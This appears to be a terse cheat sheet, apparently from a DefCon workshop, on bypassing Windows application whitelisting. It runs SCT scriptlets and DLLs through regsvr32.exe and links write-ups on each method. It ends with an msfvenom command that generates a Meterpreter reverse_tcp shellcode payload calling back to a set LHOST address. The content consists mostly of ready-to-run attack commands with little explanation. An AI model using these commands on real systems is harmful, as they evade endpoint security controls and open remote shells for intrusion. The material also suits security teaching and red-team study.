=== SCT execution ===

Write-up:

http://en.wooyun.io/2016/04/23/Use_SCT_to_Bypass_Application_Whitelisting_Protection.html

https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302

Example:

C:\Windows\System32\regsvr32.exe /u /s /i:"C:\DefCon-Tools\SRP\SubTee\Regsvr32-notepad.sct" scrobj.dll


=== DLL Execution ===

Write-up:

http://subt0x10.blogspot.com/2016/06/what-you-probably-didnt-know-about.html

Example:

cmd.dll (ReactOS)
C:\Windows\System32\regsvr32.exe "C:\DefCon-Tools\SRP\Alternatives\cmd.dll"

custom dll (limitations?)
C:\Windows\System32\regsvr32.exe C:\DefCon-Tools\SRP\SubTee\Resvr32-CalcNotepad.dll
C:\Windows\System32\regsvr32.exe /u C:\DefCon-Tools\SRP\SubTee\Resvr32-CalcNotepad.dll

custom dll shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST='192.168.187.132' -f csharp